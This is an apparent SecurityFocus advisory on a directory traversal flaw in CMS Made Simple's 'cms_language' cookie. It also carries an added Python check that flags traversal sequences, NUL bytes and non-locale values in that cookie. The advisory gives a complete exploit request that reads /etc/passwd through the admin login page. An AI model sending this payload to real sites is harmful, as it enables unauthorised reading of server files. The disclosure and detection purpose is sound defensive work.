CMS Made Simple 'cms_language' Cookie Parameter Directory Traversal Vulnerability

An attacker can exploit this issue with a browser.

The following example HTTP request is available:

GET http://www.example.com/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.example.com
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache
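
A log-side check for the request shown above, as an added example that is not part of the original advisory: it parses the Cookie header, percent-decodes cms_language and reports why the value cannot be a language name. The function names, and the rule that valid values are plain locale names such as en_US, are assumptions of this example and not CMS Made Simple's own code.

```python
import re
from urllib.parse import unquote

# Assumption: legitimate cms_language values are plain locale names such as en_US.
LOCALE_RE = re.compile(r"[A-Za-z]{2,3}(?:[_-][A-Za-z0-9]{2,8})*")

# Request from the advisory above (headers abridged) and a constructed benign one.
ADVISORY_REQUEST = (
    "GET http://www.example.com/admin/login.php HTTP/1.0\r\n"
    "Host: www.example.com\r\n"
    "Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1\r\n"
    "\r\n"
)
BENIGN_REQUEST = "GET /admin/login.php HTTP/1.0\r\nCookie: cms_language=en_US\r\n\r\n"

def parse_cookies(raw_request):
    """Return {name: raw value} from the Cookie header(s) of a raw HTTP request."""
    cookies = {}
    for line in raw_request.splitlines()[1:]:   # skip the request line
        if not line.strip():
            break                               # blank line ends the headers
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            for pair in value.split(";"):
                key, sep, val = pair.strip().partition("=")
                if sep:
                    cookies[key] = val
    return cookies

def check_language_value(raw_value):
    """Return the reasons a cms_language value is suspicious; [] means clean."""
    decoded = raw_value
    for _ in range(3):                          # bounded, catches double encoding
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    checks = [("nul-byte", "\x00" in decoded), ("dot-dot", ".." in decoded),
              ("path-separator", "/" in decoded or "\\" in decoded),
              ("not-a-locale-name", not LOCALE_RE.fullmatch(decoded))]
    return [label for label, hit in checks if hit]

def audit_request(raw_request):
    """Check the cms_language cookie of one request, if present."""
    value = parse_cookies(raw_request).get("cms_language")
    return [] if value is None else check_language_value(value)
```

The same allowlist test, applied server-side before the cookie value is used to build a file path, rejects the request outright.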


 

Copyright 2010, SecurityFocus